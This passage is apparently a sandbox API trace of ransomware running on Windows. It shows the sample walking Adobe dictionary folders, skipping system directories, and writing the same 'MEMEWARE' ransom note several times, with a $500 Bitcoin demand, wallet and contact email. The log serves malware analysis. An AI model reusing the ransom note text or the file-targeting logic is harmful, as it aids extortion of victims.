Dictionary\\all\\RESTORE_FILES.txt") returned 127 [0087.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\all\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.404] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.404] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.405] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.405] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.405] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.405] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.405] CloseHandle (hObject=0x154) returned 1 [0087.405] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.405] lstrcmpiW (lpString1="brt", lpString2="Windows") returned -1 [0087.405] lstrcmpiW (lpString1="brt", lpString2="Program Files") returned -1 [0087.405] lstrcmpiW (lpString1="brt", lpString2="Program Files (x86)") returned -1 [0087.405] lstrcmpiW (lpString1="brt", lpString2="$Recycle.bin") returned 1 [0087.405] lstrcmpiW (lpString1="brt", lpString2="System Volume Information") returned -1 [0087.405] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt") returned 109 [0087.405] lstrcmpW (lpString1="brt", lpString2=".") returned 1 [0087.406] lstrcmpW (lpString1="brt", lpString2="..") returned 1 [0087.406] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*") returned 111 [0087.406] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.406] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.406] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.406] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.406] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.406] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.406] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\.") returned 111 [0087.406] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.406] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.406] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.407] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.407] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.407] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.407] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.407] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\..") returned 112 [0087.407] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.407] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.407] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.407] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.407] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\RESTORE_FILES.txt") returned 127 [0087.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\brt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.407] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.407] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.408] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.408] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.408] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.408] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.408] CloseHandle (hObject=0x154) returned 1 [0087.408] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.408] lstrcmpiW (lpString1="brz", lpString2="Windows") returned -1 [0087.408] lstrcmpiW (lpString1="brz", lpString2="Program Files") returned -1 [0087.408] lstrcmpiW (lpString1="brz", lpString2="Program Files (x86)") returned -1 [0087.408] lstrcmpiW (lpString1="brz", lpString2="$Recycle.bin") returned 1 [0087.408] lstrcmpiW (lpString1="brz", lpString2="System Volume Information") returned -1 [0087.409] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz") returned 109 [0087.409] lstrcmpW (lpString1="brz", lpString2=".") returned 1 [0087.409] lstrcmpW (lpString1="brz", lpString2="..") returned 1 [0087.409] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*") returned 111 [0087.409] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.409] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.409] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.409] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.409] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.409] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.409] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\.") returned 111 [0087.409] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.409] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.410] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.410] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.410] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.410] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.410] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.410] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\..") returned 112 [0087.410] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.410] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.410] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.410] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.410] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\RESTORE_FILES.txt") returned 127 [0087.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\brz\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.410] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.410] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.411] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.411] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.411] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.411] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.411] CloseHandle (hObject=0x154) returned 1 [0087.411] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.411] lstrcmpiW (lpString1="dan", lpString2="Windows") returned -1 [0087.411] lstrcmpiW (lpString1="dan", lpString2="Program Files") returned -1 [0087.411] lstrcmpiW (lpString1="dan", lpString2="Program Files (x86)") returned -1 [0087.411] lstrcmpiW (lpString1="dan", lpString2="$Recycle.bin") returned 1 [0087.411] lstrcmpiW (lpString1="dan", lpString2="System Volume Information") returned -1 [0087.411] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan") returned 109 [0087.411] lstrcmpW (lpString1="dan", lpString2=".") returned 1 [0087.412] lstrcmpW (lpString1="dan", lpString2="..") returned 1 [0087.412] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*") returned 111 [0087.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.412] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.412] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.412] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.412] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.412] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.412] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\.") returned 111 [0087.412] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.412] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.412] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.412] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.412] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.412] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.412] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.412] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\..") returned 112 [0087.412] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.412] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.412] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.412] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.412] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\RESTORE_FILES.txt") returned 127 [0087.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\dan\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.413] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.413] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.414] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.414] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.414] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.414] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.414] CloseHandle (hObject=0x154) returned 1 [0087.414] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.414] lstrcmpiW (lpString1="dut", lpString2="Windows") returned -1 [0087.414] lstrcmpiW (lpString1="dut", lpString2="Program Files") returned -1 [0087.414] lstrcmpiW (lpString1="dut", lpString2="Program Files (x86)") returned -1 [0087.414] lstrcmpiW (lpString1="dut", lpString2="$Recycle.bin") returned 1 [0087.414] lstrcmpiW (lpString1="dut", lpString2="System Volume Information") returned -1 [0087.414] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut") returned 109 [0087.415] lstrcmpW (lpString1="dut", lpString2=".") returned 1 [0087.415] lstrcmpW (lpString1="dut", lpString2="..") returned 1 [0087.415] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: 